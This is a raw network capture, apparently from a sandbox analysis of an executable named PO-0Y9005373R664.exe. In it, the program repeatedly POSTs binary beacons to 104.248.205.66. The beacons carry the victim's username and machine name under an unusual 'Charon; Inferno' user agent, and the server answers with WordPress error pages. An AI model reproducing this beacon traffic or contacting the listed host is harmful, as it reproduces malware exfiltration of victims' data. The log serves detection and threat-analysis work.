Aug 29, 2024 12:03:39.972309113 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:03:38 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:03:39.972330093 CEST	1236	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
Aug 29, 2024 12:03:39.972342014 CEST	366	IN	Data Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.8	49740	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:03:40.133356094 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 153 Connection: close
Aug 29, 2024 12:03:40.138811111 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
Aug 29, 2024 12:03:42.412266970 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:03:40 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:03:42.412292957 CEST	1236	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
Aug 29, 2024 12:03:42.412311077 CEST	366	IN	Data Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.8	49741	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:03:42.558893919 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 153 Connection: close
Aug 29, 2024 12:03:42.563781977 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
Aug 29, 2024 12:03:44.843158960 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:03:43 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:03:44.843204975 CEST	1236	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
Aug 29, 2024 12:03:44.843223095 CEST	366	IN	Data Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.8	49742	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:03:44.998846054 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 153 Connection: close
Aug 29, 2024 12:03:45.003824949 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
Aug 29, 2024 12:03:47.407938957 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:03:45 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:03:47.407955885 CEST	224	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
Aug 29, 2024 12:03:47.407968044 CEST	1236	IN	Data Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
Aug 29, 2024 12:03:47.407979965 CEST	142	IN	Data Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.8	49743	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:03:47.559128046 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 153 Connection: close
Aug 29, 2024 12:03:47.563971996 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
Aug 29, 2024 12:03:49.848041058 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:03:48 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:03:49.848073959 CEST	1236	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
Aug 29, 2024 12:03:49.848088980 CEST	366	IN	Data Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.8	49744	104.248.205.66	80	2940	C:\Users\user\Desktop\PO-0Y9005373R664.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 12:03:49.998919010 CEST	245	OUT	POST /index.php/17008709 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 104.248.205.66 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 470C3A50 Content-Length: 153 Connection: close
Aug 29, 2024 12:03:50.004455090 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 68 00 75 00 62 00 65 00 72 00 74 00 01 00 0c 00 00 00 38 00 31 00 33 00 38 00 34 00 38 00 01 00 12 00 00 00 48 00 55 00 42 00 45 00 52 00 54 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.ruhubert813848HUBERT-PC0FDD42EE188E931437F4FBE2C
Aug 29, 2024 12:03:52.278361082 CEST	1236	IN	HTTP/1.0 500 Internal Server Error Date: Thu, 29 Aug 2024 10:03:50 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 2557 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED] Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
Aug 29, 2024 12:03:52.278381109 CEST	224	IN	Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75 Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
